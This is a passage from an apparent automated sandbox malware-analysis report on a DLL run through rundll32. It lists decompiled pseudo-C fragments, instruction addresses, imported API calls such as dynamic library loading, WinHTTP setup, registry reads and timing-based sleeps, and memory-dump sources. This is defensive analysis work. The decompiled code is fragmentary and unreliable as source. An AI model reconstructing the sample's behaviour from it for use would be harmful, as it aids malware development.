									_t33 = LoadLibraryA(??);
									_t49 = _t49 - 4;
									_t43 = _t33;
									if(_t33 == 0) {
										goto L13;
									} else {
										 *0x63C3A8C0 = _t43;
										 *0x63C3A8C4 =  *((intOrPtr*)(0x63c15004 + _t45 * 8));
										goto L9;
									}
								}
							}
						}
						goto L15;
						L10:
						_t45 = _t45 + 1;
					} while (_t45 != 0x15);
					return 1;
				}
				L15:
			}

0x63c071e9
0x63c071eb
0x63c071f3
0x63c071f6
0x63c07201
0x63c07206
0x63c0721b
0x63c0721b
0x63c0721d
0x63c072d5
0x63c072de
0x63c07223
0x63c07223
0x63c07223
0x63c0722c
0x63c072cf
0x00000000
0x63c07232
0x63c07232
0x63c0723a
0x00000000
0x63c07240
0x63c07240
0x63c07246
0x63c07293
0x63c0729a
0x63c0729f
0x63c072a2
0x63c072a6
0x63c072a8
0x63c072ad
0x63c072b4
0x00000000
0x00000000
0x00000000
0x00000000
0x63c07248
0x63c07248
0x63c07259
0x63c07259
0x63c0725c
0x63c07265
0x00000000
0x00000000
0x63c07257
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x63c07257
0x63c07267
0x63c0726c
0x63c0726f
0x63c07275
0x63c0727a
0x63c0727c
0x00000000
0x63c0727e
0x63c07285
0x63c0728c
0x00000000
0x63c0728c
0x63c0727c
0x63c07246
0x63c0723a
0x00000000
0x63c072b6
0x63c072b6
0x63c072b9
0x63c072ce
0x63c072ce
0x00000000

APIs

Part of subcall function 63C07170: strlen.MSVCRT ref: 63C0717A
Part of subcall function 63C07170: strrchr.MSVCRT ref: 63C071BD

GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,5ADE2570,?,?,63C075DE), ref: 63C071F6
LoadLibraryA.KERNEL32 ref: 63C0726F
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,5ADE2570,?,?,63C075DE), ref: 63C072A6

Strings

CS.JSZYM4TZZ, xrefs: 63C071E2

Memory Dump Source

Source File: 00000004.00000002.1579361651.63C00000.00000040.sdmp, Offset: 63C00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_63c00000_rundll32.jbxd

Function 00231C70, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46

APIs

NetWkstaGetInfo.NETAPI32 ref: 00231C97
calloc.MSVCRT ref: 00231CDB
NetApiBufferFree.NETAPI32 ref: 00231D04

Strings

d, xrefs: 00231C7C

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 63C088B9, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42

C-Code - Quality: 50%

			E63C088B9(void* __eax, void* __esi, void* __ebp, wchar_t* _a4, intOrPtr _a8, wchar_t* _a12, char _a24) {
				wchar_t* _v12;

				_t2 = __eax + 2; // 0x2
				__ecx = __eax + _t2;
				__ebx =  &_a24;
				if(__ecx >= 4) {
					__eax =  *(__ecx + __esi - 4);
					 *(__esp + __ecx + 0x14) =  *(__ecx + __esi - 4);
					__ecx = __ecx - 1;
					__eax = memcpy(__ebx, __esi, __ecx << 2);
					__ecx = 0;
				} else {
					if(__ecx != 0) {
						__eax =  *__esi & 0x000000ff;
						 *__ebx = __al;
						if((__cl & 0x00000002) != 0) {
							__eax =  *(__ecx + __esi - 2) & 0x0000ffff;
							 *((short*)(__ebx + __ecx - 2)) = __ax;
						}
					}
				}
				_a12 = 0;
				_a8 = 0x10;
				_a4 = 0x63c3a1c0;
				 *__esp = 0;
				__imp__SHGetSpecialFolderPathW();
				__esp = __esp - 0x10;
				if(__eax == 0) {
					__eax = wcslen(0);
				} else {
					__edx = wcslen(0x63c3a1c0);
					__eax = 0;
					if(__ebp > __edx &&  *((short*)(__esp + 0x18 + __edx * 2)) == 0x5c) {
						__eax = 0;
						 *((short*)(__esp + 0x18 + __edx * 2)) = __ax;
						_v12 = 0x63c3a1c0;
						 *__esp = __ebx;
						__imp___wcsicmp();
						0xbadbad = __al & 0x000000ff;
					}
				}
				return 1;
			}

0x63c088c0
0x63c088c0
0x63c088c4
0x63c088cb
0x63c08950
0x63c08956
0x63c0895a
0x63c08960
0x63c08960
0x63c088d1
0x63c088d3
0x63c088d5
0x63c088db
0x63c088dd
0x63c08981
0x63c08986
0x63c08986
0x63c088dd
0x63c088d3
0x63c088e3
0x63c088eb
0x63c088f3
0x63c088fb
0x63c08902
0x63c08908
0x63c0890d
0x63c08977
0x63c0890f
0x63c0891b
0x63c0891d
0x63c08921
0x63c0892b
0x63c0892d
0x63c08932
0x63c0893a
0x63c0893d
0x63c08948
0x63c08948
0x63c08921
0x63c088b5

APIs

SHGetSpecialFolderPathW.SHELL32 ref: 63C08902
wcslen.MSVCRT ref: 63C08916
_wcsicmp.MSVCRT ref: 63C0893D
wcslen.MSVCRT ref: 63C08977

Strings

\, xrefs: 63C08923

Memory Dump Source

Source File: 00000004.00000002.1579361651.63C00000.00000040.sdmp, Offset: 63C00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_63c00000_rundll32.jbxd

Function 63C08A2C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33

C-Code - Quality: 88%

			E63C08A2C(void* __ebx, void* __ecx, void* __esi, void* _a4) {

				__eax =  *(__ecx + __esi - 4);
				 *(__esp + __ecx + 0x14) =  *(__ecx + __esi - 4);
				__ecx = __ecx - 1;
				__eax = memcpy(__ebx, __esi, __ecx << 2);
				__ecx = 0;
				__eax = wcsrchr(__ebx, 0x5c);
				if(__eax == 0) {
					L4:
					__eax = wcsrchr(__ebx, 0x2e);
					if(__eax != 0) {
						 *__eax = __dx;
					}
					wcslen(__ebx) = __eax & 0xffffff00 | __eax == 0x00000020;
					__esp = __esp + 0x220;
					_pop(__ebx);
					__eax = __al & 0x000000ff;
					_pop(__esi);
					return __al & 0x000000ff;
				} else {
					__eax =  &(__eax[0]);
					__ebx = __eax;
					if(__eax == 0) {
						return 1;
					} else {
						goto L4;
					}
				}
			}

0x63c08a30
0x63c08a36
0x63c08a3a
0x63c08a40
0x63c08a40
0x63c089e8
0x63c089ef
0x63c089f8
0x63c08a03
0x63c08a0a
0x63c08a0e
0x63c08a0e
0x63c08a1c
0x63c08a1f
0x63c08a25
0x63c08a26
0x63c08a29
0x63c08a2b
0x63c089f1
0x63c089f1
0x63c089f4
0x63c089f6
0x63c089c1
0x00000000
0x00000000
0x00000000
0x63c089f6

APIs

wcsrchr.MSVCRT ref: 63C089E8
wcsrchr.MSVCRT ref: 63C08A03
wcslen.MSVCRT ref: 63C08A14

Strings

., xrefs: 63C089F8

Memory Dump Source

Source File: 00000004.00000002.1579361651.63C00000.00000040.sdmp, Offset: 63C00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_63c00000_rundll32.jbxd

Function 63C01450, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23

APIs

GetModuleHandleA.KERNEL32(?,?,?,?,?,63C145FB), ref: 63C01466
GetProcAddress.KERNEL32 ref: 63C01483

Strings

libgcj-13.dll, xrefs: 63C0145F
_Jv_RegisterClasses, xrefs: 63C01478

Memory Dump Source

Source File: 00000004.00000002.1579361651.63C00000.00000040.sdmp, Offset: 63C00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_63c00000_rundll32.jbxd

Function 00221500, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23

APIs

GetModuleHandleA.KERNEL32(?,?,?,?,?,0023A2CB), ref: 00221516
GetProcAddress.KERNEL32 ref: 00221533

Strings

libgcj-13.dll, xrefs: 0022150F
_Jv_RegisterClasses, xrefs: 00221528

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 63C01459, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20

APIs

GetModuleHandleA.KERNEL32(?,?,?,?,?,63C145FB), ref: 63C01466
GetProcAddress.KERNEL32 ref: 63C01483

Strings

libgcj-13.dll, xrefs: 63C0145F
_Jv_RegisterClasses, xrefs: 63C01478

Memory Dump Source

Source File: 00000004.00000002.1579361651.63C00000.00000040.sdmp, Offset: 63C00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_63c00000_rundll32.jbxd

Function 00221509, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20

APIs

GetModuleHandleA.KERNEL32(?,?,?,?,?,0023A2CB), ref: 00221516
GetProcAddress.KERNEL32 ref: 00221533

Strings

libgcj-13.dll, xrefs: 0022150F
_Jv_RegisterClasses, xrefs: 00221528

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 00233F40, Relevance: 6.3, APIs: 5, Instructions: 96

APIs

calloc.MSVCRT ref: 00233FB5
free.MSVCRT ref: 00234010
free.MSVCRT ref: 0023403C
calloc.MSVCRT ref: 00234058
memcpy.MSVCRT ref: 00234072

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 0022D3A0, Relevance: 6.3, APIs: 5, Instructions: 78

APIs

calloc.MSVCRT ref: 0022D3C6
free.MSVCRT(?,?,?,?,?,?,00000000,?,?,0022E57B), ref: 0022D3FB

Part of subcall function 0022D0B0: memcpy.MSVCRT ref: 0022D13A
Part of subcall function 0022D0B0: calloc.MSVCRT ref: 0022D159

free.MSVCRT ref: 0022D45F
free.MSVCRT ref: 0022D46B
free.MSVCRT ref: 0022D485

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 002398D0, Relevance: 6.2, APIs: 4, Instructions: 163

APIs

fgetwc.MSVCRT ref: 00239918
memset.MSVCRT ref: 00239990
memset.MSVCRT ref: 00239A70
memset.MSVCRT ref: 00239AFC

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 00239530, Relevance: 6.2, APIs: 4, Instructions: 154

APIs

getc.MSVCRT ref: 00239578
memset.MSVCRT ref: 002395E6
memset.MSVCRT ref: 002396C0
memset.MSVCRT ref: 00239740

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 0023A059, Relevance: 6.1, APIs: 4, Instructions: 54

APIs

Part of subcall function 00235430: SetThreadExecutionState.KERNEL32 ref: 002354A5
Part of subcall function 00235430: SetThreadExecutionState.KERNEL32 ref: 002354CC

Part of subcall function 002353F0: FreeLibrary.KERNEL32(?,?,?,?,?,?,0023A19A), ref: 0023540B

Part of subcall function 0022F660: CloseHandle.KERNEL32 ref: 0022F66B

Part of subcall function 00227650: TerminateThread.KERNEL32 ref: 00227667
Part of subcall function 00227650: CloseHandle.KERNEL32 ref: 00227678
Part of subcall function 00227650: CloseHandle.KERNEL32 ref: 00227697

Part of subcall function 0022DD40: free.MSVCRT(?,?,00000000,773DC380,0023A1AF), ref: 0022DD53

Part of subcall function 00231A10: RegOpenKeyExW.KERNEL32 ref: 00231A4B
Part of subcall function 00231A10: RegQueryValueExW.ADVAPI32 ref: 00231A89
Part of subcall function 00231A10: RegCloseKey.ADVAPI32 ref: 00231A9B
Part of subcall function 00231A10: calloc.MSVCRT ref: 00231ABD
Part of subcall function 00231A10: RegQueryValueExW.ADVAPI32 ref: 00231AEF
Part of subcall function 00231A10: free.MSVCRT ref: 00231AFB

Part of subcall function 0022FAB0: free.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000001,00000000,773DC380,0023A0E9), ref: 0022FB07
Part of subcall function 0022FAB0: calloc.MSVCRT ref: 0022FB61
Part of subcall function 0022FAB0: realloc.MSVCRT ref: 0022FBC9
Part of subcall function 0022FAB0: strlen.MSVCRT ref: 0022FBD9
Part of subcall function 0022FAB0: memcpy.MSVCRT ref: 0022FBEC

Part of subcall function 0022FE00: lstrlenW.KERNEL32 ref: 0022FE2F
Part of subcall function 0022FE00: calloc.MSVCRT ref: 0022FE49
Part of subcall function 0022FE00: WideCharToMultiByte.KERNEL32 ref: 0022FE8A
Part of subcall function 0022FE00: lstrlenA.KERNEL32 ref: 0022FE96
Part of subcall function 0022FE00: free.MSVCRT ref: 0022FEBB
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0022FF0B
Part of subcall function 0022FE00: SetCurrentDirectoryW.KERNEL32 ref: 0022FF33
Part of subcall function 0022FE00: free.MSVCRT ref: 0022FF45
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0022FF6D
Part of subcall function 0022FE00: free.MSVCRT ref: 0022FF82
Part of subcall function 0022FE00: lstrlenW.KERNEL32 ref: 0022FF8E
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0022FFCB
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0022FFFB
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0023002B
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0023004D
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0023006F
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 00230091
Part of subcall function 0022FE00: GetTempPathW.KERNEL32 ref: 002300AC
Part of subcall function 0022FE00: SetCurrentDirectoryW.KERNEL32(773E5431,773E5431), ref: 002300C8
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 002300E9
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 00230168
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 002301E3
Part of subcall function 0022FE00: _wtoi.MSVCRT ref: 00230272
Part of subcall function 0022FE00: _wtoi.MSVCRT ref: 0023027D
Part of subcall function 0022FE00: free.MSVCRT ref: 002302D4
Part of subcall function 0022FE00: free.MSVCRT ref: 002302E0
Part of subcall function 0022FE00: free.MSVCRT ref: 002302E8
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 00230309
Part of subcall function 0022FE00: GetTempPathW.KERNEL32 ref: 00230342
Part of subcall function 0022FE00: GetTempFileNameW.KERNEL32 ref: 00230374
Part of subcall function 0022FE00: _wtoi.MSVCRT ref: 00230390
Part of subcall function 0022FE00: lstrlenW.KERNEL32 ref: 002303A5
Part of subcall function 0022FE00: calloc.MSVCRT ref: 002303BE
Part of subcall function 0022FE00: memcpy.MSVCRT ref: 002303DF
Part of subcall function 0022FE00: free.MSVCRT ref: 002303F2
Part of subcall function 0022FE00: free.MSVCRT ref: 002303FA
Part of subcall function 0022FE00: calloc.MSVCRT ref: 00230424
Part of subcall function 0022FE00: calloc.MSVCRT ref: 0023049C
Part of subcall function 0022FE00: calloc.MSVCRT ref: 002304DE
Part of subcall function 0022FE00: memcpy.MSVCRT ref: 002304FC
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 00230528
Part of subcall function 0022FE00: wcslen.MSVCRT ref: 00230584
Part of subcall function 0022FE00: _wtoi.MSVCRT ref: 00230597
Part of subcall function 0022FE00: free.MSVCRT ref: 002305D8
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 002305F9
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 00230648
Part of subcall function 0022FE00: free.MSVCRT ref: 0023066B
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 00230680
Part of subcall function 0022FE00: _wtoi.MSVCRT ref: 002306AB
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 002306E6
Part of subcall function 0022FE00: _wtoi.MSVCRT ref: 00230711
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0023073E
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 00230773
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0023079F
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 002307C0
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 002307E1
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 00230802
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0023082A
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0023084B
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0023086C
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0023088D
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 002308B5
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 002308D6
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 002308F7
Part of subcall function 0022FE00: GetFullPathNameW.KERNEL32 ref: 00230963
Part of subcall function 0022FE00: free.MSVCRT ref: 00230979
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0023098E
Part of subcall function 0022FE00: GetFileAttributesW.KERNEL32 ref: 002309B5
Part of subcall function 0022FE00: wcslen.MSVCRT ref: 002309C3
Part of subcall function 0022FE00: wcslen.MSVCRT ref: 002309D6
Part of subcall function 0022FE00: RemoveDirectoryW.KERNEL32 ref: 00230A4A

GetTickCount.KERNEL32 ref: 00239F69
GetTickCount.KERNEL32 ref: 00239F71
GetTickCount.KERNEL32 ref: 00239F85
GetTickCount.KERNEL32 ref: 00239FA7
Sleep.KERNEL32 ref: 00239FDF
Sleep.KERNEL32 ref: 0023A069

Part of subcall function 0022EAE0: free.MSVCRT ref: 0022EB7B
Part of subcall function 0022EAE0: free.MSVCRT ref: 0022EB87
Part of subcall function 0022EAE0: free.MSVCRT ref: 0022EB93
Part of subcall function 0022EAE0: Sleep.KERNEL32 ref: 0022EBA9
Part of subcall function 0022EAE0: free.MSVCRT ref: 0022ED81
Part of subcall function 0022EAE0: free.MSVCRT ref: 0022ED8D
Part of subcall function 0022EAE0: free.MSVCRT ref: 0022ED99
Part of subcall function 0022EAE0: free.MSVCRT ref: 0022EDAF

Sleep.KERNEL32 ref: 0023A01D
free.MSVCRT ref: 0023A21A

Part of subcall function 00221560: free.MSVCRT(?,?,00000000,00000000,0023A237), ref: 00221571

GetTickCount.KERNEL32 ref: 0023A033
Sleep.KERNEL32 ref: 0023A04F
GetTickCount.KERNEL32 ref: 0023A074

Part of subcall function 0022E660: free.MSVCRT ref: 0022E6C7
Part of subcall function 0022E660: free.MSVCRT ref: 0022E6D3
Part of subcall function 0022E660: Sleep.KERNEL32 ref: 0022E6EA
Part of subcall function 0022E660: realloc.MSVCRT ref: 0022E7FE
Part of subcall function 0022E660: free.MSVCRT ref: 0022E827
Part of subcall function 0022E660: free.MSVCRT ref: 0022E833

calloc.MSVCRT ref: 0023A0FF
MultiByteToWideChar.KERNEL32 ref: 0023A12C
free.MSVCRT ref: 0023A169
free.MSVCRT ref: 0023A177
free.MSVCRT ref: 0023A225
lstrlenW.KERNEL32 ref: 0023A24D
lstrlenW.KERNEL32 ref: 0023A290

Part of subcall function 0022E860: free.MSVCRT ref: 0022E8E4
Part of subcall function 0022E860: free.MSVCRT ref: 0022E8F0
Part of subcall function 0022E860: free.MSVCRT ref: 0022E8FC
Part of subcall function 0022E860: free.MSVCRT ref: 0022E908
Part of subcall function 0022E860: Sleep.KERNEL32 ref: 0022E91E
Part of subcall function 0022E860: free.MSVCRT ref: 0022EA98
Part of subcall function 0022E860: free.MSVCRT ref: 0022EAA4
Part of subcall function 0022E860: free.MSVCRT ref: 0022EAB0
Part of subcall function 0022E860: free.MSVCRT ref: 0022EABC

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 00233410, Relevance: 6.1, APIs: 4, Instructions: 53

APIs

RegQueryValueExW.ADVAPI32 ref: 0023345C
calloc.MSVCRT ref: 00233479
RegQueryValueExW.ADVAPI32 ref: 002334A3
free.MSVCRT ref: 002334C3

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 0022E3EC, Relevance: 6.0, APIs: 4, Instructions: 50

APIs

WinHttpOpen.WINHTTP(?,?,?,?,?,?,?,?,?,?,00000000,?,?,0022E564), ref: 0022E321
WinHttpSetOption.WINHTTP ref: 0022E363
WinHttpSetStatusCallback.WINHTTP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0022E391
WinHttpSetTimeouts.WINHTTP ref: 0022E3C6
GetLastError.KERNEL32 ref: 0022E3E0

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 0022F5A7, Relevance: 6.0, APIs: 4, Instructions: 47

APIs

Part of subcall function 002215B0: GetTickCount.KERNEL32 ref: 002215B8

GetTickCount.KERNEL32 ref: 0022F3FD
GetTickCount.KERNEL32 ref: 0022F40F
Sleep.KERNEL32 ref: 0022F420
PeekNamedPipe.KERNEL32 ref: 0022F469
free.MSVCRT ref: 0022F498

Part of subcall function 0022F1E0: WaitForSingleObject.KERNEL32 ref: 0022F210
Part of subcall function 0022F1E0: SetEvent.KERNEL32(?,?,?,?,00000000,00000000,773DC380,?,0022F64E,?,?,00239F83), ref: 0022F238
Part of subcall function 0022F1E0: Sleep.KERNEL32(?,?,?,?,?,00000000,00000000,773DC380,?,0022F64E,?,?,00239F83), ref: 0022F244
Part of subcall function 0022F1E0: calloc.MSVCRT ref: 0022F268
Part of subcall function 0022F1E0: SetEvent.KERNEL32(?,?,?,?,00000000,00000000,773DC380,?,0022F64E,?,?,00239F83), ref: 0022F29B

Part of subcall function 0022F2D0: WaitForSingleObject.KERNEL32 ref: 0022F2E8
Part of subcall function 0022F2D0: CloseHandle.KERNEL32 ref: 0022F2FB
Part of subcall function 0022F2D0: CloseHandle.KERNEL32 ref: 0022F315
Part of subcall function 0022F2D0: CloseHandle.KERNEL32 ref: 0022F32E
Part of subcall function 0022F2D0: TerminateProcess.KERNEL32 ref: 0022F350

realloc.MSVCRT ref: 0022F505
ReadFile.KERNEL32 ref: 0022F532
WaitForSingleObject.KERNEL32 ref: 0022F55E
free.MSVCRT ref: 0022F5C8

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 63C13640, Relevance: 6.0, APIs: 4, Instructions: 46

APIs

_lock.MSVCRT ref: 63C13665
__dllonexit.MSVCRT ref: 63C136A3
_unlock.MSVCRT ref: 63C136D3
_onexit.MSVCRT ref: 63C136E7

Memory Dump Source

Source File: 00000004.00000002.1579361651.63C00000.00000040.sdmp, Offset: 63C00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_63c00000_rundll32.jbxd

Function 002355A0, Relevance: 6.0, APIs: 4, Instructions: 46

APIs

_lock.MSVCRT ref: 002355C5
__dllonexit.MSVCRT ref: 00235603
_unlock.MSVCRT ref: 00235633
_onexit.MSVCRT ref: 00235647

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 63C13E09, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32

C-Code - Quality: 40%

			E63C13E09(void* __ebx) {
				void* _t25;

				while(1) {
					__ebx = __ebx + 1;
					__eflags = __ebx -  *0x63c3a7d8; // 0x0
					if(__eflags >= 0) {
						break;
					}
					__esi = __ebx + __ebx * 2;
					__eax =  *0x63c3a7dc; // 0x1fe160
					__edi = __esi * 4;
					__eax = __eax + __edi;
					__edx =  *__eax;
					__eflags = __edx;
					if(__edx == 0) {
						continue;
					} else {
